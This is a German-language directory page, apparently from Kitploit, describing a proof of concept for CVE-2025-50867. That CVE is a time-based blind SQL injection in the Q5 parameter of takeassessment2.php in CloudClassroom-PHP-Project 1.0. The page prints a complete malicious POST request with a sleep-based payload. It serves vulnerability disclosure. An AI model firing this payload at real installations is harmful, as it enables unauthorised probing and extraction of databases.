Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-50867 — Proof-of-Concept für eine zeitbasierte Blind-SQL-Injection-Schwachstelle im Endpunkt takeassessment2.php von CloudClassroom-PHP-Project 1.0, die eine Remote-Ausnutzung mittels einer manipulierten POST-Anfrage demonstriert. | Kitploit
Tools/GitHubGitHub/sacx-7/cve-2025-50867
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsDatenbanksicherheit
GitHubsacx-7/cve-2025-50867

CVE-2025-50867

Proof-of-Concept für eine zeitbasierte Blind-SQL-Injection-Schwachstelle im Endpunkt takeassessment2.php von CloudClassroom-PHP-Project 1.0, die eine Remote-Ausnutzung mittels einer manipulierten POST-Anfrage demonstriert.

Repository anzeigen
5vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Eine SQL-Injection-Schwachstelle existiert im takeassessment2.php-Endpunkt des CloudClassroom-PHP-Project 1.0, bei dem der POST-Parameter Q5 direkt ohne Bereinigung in SQL-Anweisungen eingebettet wird.


Schwachstellentyp :

SQL Injection


Anbieter des Produkts :

https://github.com/mathurvishal/CloudClassroom-PHP-Project


Betroffene Produktcodebasis :

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0


Betroffene Komponente :

takeassessment2.php, Q5 POST-Parameter, SQL-Abfragelogik


Angriffstyp : Remote

Angriffsvektoren :

Um diese Schwachstelle auszunutzen, sendet ein Angreifer eine bösartige POST-Anfrage an /CloudClassroom-PHP-Project-master/takeassessment2.php mit einer Payload im Q5-Parameter, die eine Zeitverzögerung bei der SQL-Verarbeitung verursacht (blinde zeitbasierte SQLi).

POST-Request:

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Dies verursacht eine 6-sekündige Verzögerung in der Antwort, was die Schwachstelle bestätigt.


Referenz :

https://owasp.org/www-community/attacks/SQL_Injection


Entdecker : saurabh solanki

Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/

Tool herunterladen